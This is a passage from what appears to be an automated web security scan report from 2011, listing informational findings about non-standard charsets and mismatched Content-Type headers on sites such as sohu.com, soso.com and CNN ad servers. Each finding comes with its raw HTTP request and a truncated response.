Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:26:24 GMT
X-UA-Compatible: IE=EmulateIE7
Content-Length: 3739
Content-Type: text/html
Date: Mon, 15 Aug 2011 18:24:39 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk" />
<title>
...[SNIP]...

19.9. http://www.sohu.com/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.sohu.com
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: www.sohu.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Connection: keep-alive
Date: Mon, 15 Aug 2011 18:24:05 GMT
Server: SWS
Vary: Accept-Encoding,X-Up-Calling-Line-id,X-Source-ID,X-Up-Bearer-Type
Cache-Control: max-age=70
Expires: Mon, 15 Aug 2011 18:25:15 GMT
Last-Modified: Mon, 15 Aug 2011 18:03:14 GMT
Content-Length: 298682
FSS-Cache: HIT from 31523473.39387985.42556425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="z
...[SNIP]...
<head>
<meta http-equiv="content-type" content="text/html; charset=GBK" />

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
...[SNIP]...

19.10. http://www.soso.com/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.soso.com
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: www.soso.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:24:21 GMT
Content-Type: text/html
Connection: keep-alive
Expires: Mon, 15 Aug 2011 20:24:21 GMT
Cache-Control: max-age=7200
Content-Length: 16472

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>..........</title>
<script type="text/javascript">d = document;d.domain = "soso.com";</
...[SNIP]...

19.11. http://www.soso.com/wh.q  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.soso.com
Path:   /wh.q

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /wh.q?w=x HTTP/1.1
Host: www.soso.com
Proxy-Connection: keep-alive
Referer: http://www.soso.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: suid=6067540526; pgv_pvid=9085923014; pgv_flv=10.3 r183; pgv_info=pgvReferrer=&ssid=s8020529487

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:24:42 GMT
Content-Type: text/html;charset=GBK
Connection: keep-alive
Expires: Mon, 15 Aug 2011 18:34:42 GMT
Vary: Accept-Encoding
Content-Length: 103

0    ......    0
0    ....    0
0    ....    0
0    ....    0
0    ......    0
0    ......    0
0    ......    0
0    ......    0
0    ......    0
0    ......    0

20. Content type incorrectly stated  previous  next
There are 54 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


20.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**;10,3,183;1920;1200;http%3A_@2F_@2Fads.cnn.com_@2Fhtml.ng_@2Fsite%3Dcnn_money_@26cnn_money_position%3D150x50_spon1_@26cnn_money_rollup%3Dmarkets_and_stocks_@26cnn_money_section%3Dtrading_center_@26params.styles%3Dfs_@26page.allowcompete%3Dyes_@26tile%3D1313434014105_@26page.allowcompete%3Dyes_@26domId%3D67962?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect= HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj?click=http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598,10240,12384,17251,18961,19419,20918,25342,25344,25412,27581,32749,32922,33852,34172,34575,35306,45259,45260,45546,45604,46096,46694,47399,48618,48619,48716,49072,49727,50010,50778,50779,50825,51060,51253,51392,51684,51759,52030,52032,52082,52207,52256,52366,52376,52423,52592,52690,52746,52830,52835,52872,52939,52979,53014&Values=1589&Redirect=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4e3acdbfe6377; i_1=33:1411:1209:100:0:52753:1312480942:L|33:353:1217:141:0:48529:1312477954:B2|33:1411:1163:100:0:48526:1312477092:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 15 Aug 2011 18:47:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=25:1715:1137:106:0:53518:1313434067:L|25:1715:1138:106:0:53518:1313433994:L|33:1411:1209:100:0:52753:1312480942:L; expires=Thu, 15-Sep-2011 18:47:47 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 949

   function wsod_image1715() {
       document.write('<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=393569&AdID=543790&TargetID=5204&Segments=1869,1880,2244,2591,2700,2743,3285,6298,6520,7043,8598
...[SNIP]...

20.2. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x23_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x23_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105?callback=jsonp1313434029233&_=1313434043146 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:47:15 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:47:15 GMT
Pragma: no-cache
Content-Length: 115
Content-Type: text/html

callback({ "ad": { "advertiser_text": "Trade Now", "click_url": "", "tracking": "", "third_party_tracking": "" } })

20.3. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105?callback=jsonp1313434029234&_=1313434043146 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:47:17 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:47:17 GMT
Pragma: no-cache
Content-Length: 1431
Content-Type: text/html

callback({ "ad": { "advertiser_text": "E*TRADE","click_url": "http://ad.doubleclick.net/click;h=v2|3D51|0|0|%2a|j;234140391;0-0;0;58074575;31-1|1;39756396|39774183|1;;;pc=[TPAS_ID]%3fhttps://us.etrade
...[SNIP]...

20.4. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105?callback=jsonp1313434029235&_=1313434043146 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:47:17 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:47:17 GMT
Pragma: no-cache
Content-Length: 1688
Content-Type: text/html

callback({ "ad": { "advertiser_text": "TD Ameritrade","click_url": "http://ads.cnn.com/event.ng/Type%3dclick%26FlightID%3d384614%26AdID%3d526236%26TargetID%3d108094%26Segments%3d1869,1880,2244,2743,32
...[SNIP]...

20.5. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105?callback=jsonp1313434029236&_=1313434043147 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qca=P0-2040275928-1313434008975; __switchTo5x=38; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __unam=7549672-131cec47d99-1e28128-2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:47:17 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:47:17 GMT
Pragma: no-cache
Content-Length: 1665
Content-Type: text/html

callback({ "ad": { "advertiser_text": "Scottrade","click_url": "http://ads.cnn.com/event.ng/Type%3dclick%26FlightID%3d351447%26AdID%3d483240%26TargetID%3d108070%26Segments%3d1869,1880,2244,2743,3285,6
...[SNIP]...

20.6. http://answers.ask.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://answers.ask.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: answers.ask.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; __utma=164660207.1462572272.1313432935.1313432935.1313432935.1; __utmb=164660207.1.10.1313432935; __utmc=164660207; __utmz=164660207.1313432935.1.1.utmcsr=ask|utmccn=(organic)|utmcmd=organic|utmctr=xss; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:28:04 GMT
Server: Apache
Last-Modified: Thu, 11 Aug 2011 19:00:26 GMT
ETag: "52ada0-47e-4aa3f68dfc680"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

20.7. http://auto.sohu.com/zhuanti/ten/new_model.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://auto.sohu.com
Path:   /zhuanti/ten/new_model.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /zhuanti/ten/new_model.js HTTP/1.1
Host: auto.sohu.com
Proxy-Connection: keep-alive
Referer: http://www.sohu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Connection: keep-alive
Date: Mon, 15 Aug 2011 17:34:28 GMT
Server: SWS
Vary: Accept-Encoding
Cache-Control: max-age=3600
Expires: Mon, 15 Aug 2011 18:34:28 GMT
Last-Modified: Mon, 15 Aug 2011 07:50:08 GMT
Content-Length: 17793
FSS-Cache: HIT from 30540418.37421890.41573355
Accept-Ranges: bytes


var brandMods =[{i:217,n:'A ..........',s:[{n:'......-....',b:[{i:1941,n:'DB9'},{i:2246,n:'DB9 ....'},{i:1945,n:'DBS'},{i:1942,n:'V8 Vantage'},{i:1946,n:'V8 VR'},{i:2575,n:'Rapide'}]}]},{i:191,n:'A
...[SNIP]...

20.8. http://bes-clck.com/v  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bes-clck.com
Path:   /v

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /v?i=1$AgAAAAAAAAADAAAAAAAAAAIAAAAAylA8kyOhTmCbc9GkoHFuW-dzfeIVzAGjo3UtB7JarO3M-7TcuWROki14jAXM8EFDK4TDiP59VjJ51NVgQeNl2ZtSCFHtNIC1H0GL6PscaVsrMQovLbRSWStTMBmQEDWXNO8rUHw3D8kk1mTnMp5qD35KQCtQslFDx7wG952Lm5hz.-LgQf2bqZfLsFS4thEVqOJ-jEzeZIiwkF5uMrfiU7nTFDNwT5MK-1s3hnr3qwvuxlXeyu5UAPuVXKsiTPIDh0OfLGkB1LMEd64g.reJJ3kvq.A3kHn0hkB-Tc1IbfWqu7aIsrCMs-G9UdBT5mmcIXt5dfiir6js12HMvvxEbhhmMtjV6xp7rY4X2FEIKG1sclCOnXuTBUoqiXpGqfeT0a2wW.Q3ju3mgqJmX3ZPfuan15VhWnGFkmCPknAfY1GCNNcW.TXKqhincDXoTm3pggtdvByIzzyW9qQxUYseFYV9ogpaFmwoyZKpZQlpzQYdpXuKG43O22j8lQzOCb8sJviFNi7E.GyLQZt3ml9gntv8ROdc8rjTTIrTinft46eANRtPnHgCbB6L3spBg.J1slQt60b9pn-RdtJIQa0J--ojYArf0oGIicngEt5gCN9.feCnrXxYtziq3VZjE3t.nDDiHZLnPA80fEGfjmbTlIVQrCW0gvWYJno8IYIWP0Pg5khlIWGJAMWILriRx-auBnDBaw__ HTTP/1.1
Host: bes-clck.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/showtimes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 2
Date: Mon, 15 Aug 2011 18:26:27 GMT
Server: Server

{}

20.9. http://clients1.google.com/complete/search  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://clients1.google.com
Path:   /complete/search

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /complete/search?client=chrome&hl=en-US&q=sohu HTTP/1.1
Host: clients1.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=69580f9920d5f494:U=02e48c2870b7e459:FF=0:TM=1310132119:LM=1310132498:S=QbWdR-loyTGm4ljm; NID=49=SeqENWDJp1RhQynOGuaP5MaEDdFIEWzZKNfyzN11QVNUFV6g57NKp2RhvR_8p-q-LzBn5EkmLpuOPnz6NlRmKJ-efD6HvcO3-ab2X1zJIi23BmyRIfNPcRAplfZ_7qJ7

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:23:56 GMT
Expires: Mon, 15 Aug 2011 18:23:56 GMT
Cache-Control: private, max-age=3600
Content-Type: text/javascript; charset=UTF-8
Content-Disposition: attachment
Server: gws
Content-Length: 179
X-XSS-Protection: 1; mode=block

["sohu",["http:\/\/www.sohu.com\/","sohu","sohu tv","sohu movie"],["......-...........................","","",""],[],{"google:suggesttype":["NAVIGATION","QUERY","QUERY","QUERY"]}]

20.10. http://content.pop6.com/banners/aff/35057/120x160/120x160_Dayss.flv  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pop6.com
Path:   /banners/aff/35057/120x160/120x160_Dayss.flv

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /banners/aff/35057/120x160/120x160_Dayss.flv HTTP/1.1
Host: content.pop6.com
Proxy-Connection: keep-alive
Referer: http://content.pop6.com/banners/aff/piclist/video_piclist/35057/120x160/PG_Dayss_120x160.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Thu, 09 Dec 2010 17:24:40 GMT
ETag: "13049652-4dafd-496fd8343e600"
Accept-Ranges: bytes
Content-Length: 318205
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: HIT from origin.friendfinderinc.com:3128
X-Cache-Lookup: HIT from origin.friendfinderinc.com:3128
X-Cache-Lookup: HIT from origin.friendfinderinc.com:3128
Date: Mon, 15 Aug 2011 18:56:02 GMT
Connection: close

FLV.....    .................
onMetaData....
..duration.@.ffffff..width.@^........height.@d.......videodatarate.@.p......    framerate.@.........videocodecid.@.........canSeekToEnd....    ......'j.........    on
...[SNIP]...

20.11. http://content.pop6.com/banners/aff/35057_R/120x160/120x160_Masami.flv  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pop6.com
Path:   /banners/aff/35057_R/120x160/120x160_Masami.flv

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /banners/aff/35057_R/120x160/120x160_Masami.flv HTTP/1.1
Host: content.pop6.com
Proxy-Connection: keep-alive
Referer: http://content.pop6.com/banners/aff/piclist/video_piclist/35057/120x160R/R_Masami_120x160.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Tue, 14 Dec 2010 17:30:31 GMT
ETag: "13828c20-1e135-497622d649bc0"
Accept-Ranges: bytes
Content-Length: 123189
Content-Type: text/plain; charset=UTF-8
